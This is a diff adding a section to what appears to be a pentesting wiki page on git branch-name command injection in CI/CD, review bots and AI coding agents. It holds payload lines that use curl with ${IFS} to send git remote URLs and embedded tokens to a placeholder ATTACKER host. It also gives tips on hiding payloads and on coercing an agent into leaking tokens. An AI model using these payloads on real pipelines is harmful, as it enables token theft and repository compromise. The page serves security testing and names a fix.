diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md
index 41a11880d6a..d2f6c2008a9 100644
--- a/src/pentesting-web/command-injection.md
+++ b/src/pentesting-web/command-injection.md
@@ -266,6 +266,61 @@ java.lang.Runtime.getRuntime().exec(cmd);
 - Swap the callback for a reverse shell; if the UI/PoC cannot handle pipes/redirects, stage a payload with one command and exec it with a second request.
 - Horizon3's [CVE-2023-27350.py](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) automates the auth bypass, config flips, command execution, and rollback—run it through an upstream proxy (e.g., `proxychains` → Squid) when the service is only reachable internally.
 
+## Git branch/ref name injection in CI/CD, code review and coding-agent setup
+
+Some automation platforms accept a **repository + branch/ref** and later interpolate that value into a **shell command** during checkout, setup, review, or deployment. If the branch/ref reaches a shell without strict allowlisting or safe argument separation, **Git metadata becomes a command injection primitive**.
+
+Typical vulnerable patterns:
+
+- `git fetch origin $BRANCH`
+- `git checkout $REF`
+- `sh -c "git fetch origin $branch && git checkout $branch"`
+- setup wrappers that log, clone, or review `refs/heads/...` values inside Bash
+
+This matters in **CI/CD**, **GitHub Actions helpers**, **self-hosted review bots**, and **cloud coding agents** because branch names are often attacker-controlled in fork/PR workflows or by anyone who can create refs in the repo.
+
+### What to test
+
+1. Create a benign-looking branch name that should break command parsing, such as `-1`, and verify whether checkout/setup logs show syntax or git errors.
+2. If spaces are blocked by the Git provider, replace them with `${IFS}` so Bash recreates whitespace at execution time.
+3. Try shell metacharacters and command substitution inside the ref:
+
+```bash
+main;id;
+main;curl${IFS}http://ATTACKER/$(whoami);
+main;curl${IFS}http://ATTACKER/`git${IFS}remote${IFS}get-url${IFS}origin`;
+```
+
+4. If the UI truncates or visually hides branch names, test Unicode padding or unusual whitespace to disguise the payload while keeping the shell-relevant bytes intact.
+
+### High-value post-exploitation target: authenticated git remotes
+
+During early clone/setup stages, many systems temporarily configure `origin` with an embedded **PAT/OAuth token / installation token**:
+
+```bash
+git remote get-url origin
+```
+
+If command execution lands **before the token is removed/redacted**, this often leaks credentials that can be reused against GitHub/GitLab/Bitbucket or the CI provider itself.
+
+Common exfiltration paths:
+
+- Write the remote URL to a file and coerce the agent/review task to print that file later.
+- Send it directly to attacker infrastructure:
+
+```bash
+main;curl${IFS}http://ATTACKER/`git${IFS}remote${IFS}get-url${IFS}origin`;
+```
+
+- Read task history/log APIs if the platform exposes backend endpoints that return job output without requiring UI interaction.
+
+### Practical notes
+
+- Branch restrictions are not enough. Git providers may block literal spaces but still allow strings such as `${IFS}`, metacharacters, or Unicode separators that become dangerous only when evaluated by a shell.
+- This is especially dangerous when the malicious branch is set as the **default branch** or used in **automated code review** flows, because every victim job becomes a trigger.
+- If the application uses `execve`/`subprocess.run([...])`/`execFile()` with each argument split safely, ref names stop being shell syntax and the bug usually disappears.
+- If you are testing CI/CD abuse more broadly, see [Pentesting CI/CD](https://cloud.hacktricks.wiki/en/pentesting-ci-cd/pentesting-ci-cd-methodology.html).
+
 ## Brute-Force Detection List
 
 
@@ -287,5 +342,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 - [HTB: Gavel](https://0xdf.gitlab.io/2026/03/14/htb-gavel.html)
 - [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
 - [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/)
+- [BeyondTrust: How Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise](https://www.beyondtrust.com/blog/entry/openai-codex-command-injection-vulnerability-github-token)
 
 {{#include ../banners/hacktricks-training.md}}